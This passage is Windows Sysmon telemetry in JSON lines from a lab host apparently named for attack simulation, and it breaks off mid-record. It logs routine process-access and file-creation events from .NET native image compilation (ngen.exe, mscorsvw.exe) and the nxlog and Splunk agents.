{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8966,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.435\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-001009081100}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.435","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-001009081100}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8967,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.435\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-001009081100}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.435","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-001009081100}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8968,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.451\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-001009081100}\r\nTargetProcessId: 5088\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.451","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-001009081100}","TargetProcessId":"5088","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8969,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.685\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.685","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8970,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:03.873\r\nProcessGuid: {E2A3D6B1-13A7-5F25-0000-001009081100}\r\nProcessId: 5088\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13e0-0\\XamlBuildTask.dll\r\nCreationUtcTime: 2020-08-01 07:03:03.873","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:03.873","ProcessGuid":"{E2A3D6B1-13A7-5F25-0000-001009081100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13e0-0\\XamlBuildTask.dll","CreationUtcTime":"2020-08-01 07:03:03.873","EventReceivedTime":"2020-08-01 07:03:04","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8971,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.904\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-0010C1190F00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.904","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-0010C1190F00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8972,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.904\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1376-5F25-0000-0010C1190F00}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.904","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1376-5F25-0000-0010C1190F00}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8973,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.919\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13A7-5F25-0000-00104E0D1100}\r\nTargetProcessId: 4560\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:03.919","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13A7-5F25-0000-00104E0D1100}","TargetProcessId":"4560","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8974,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:03.966\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1396-5F25-0000-0010C04E1000}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 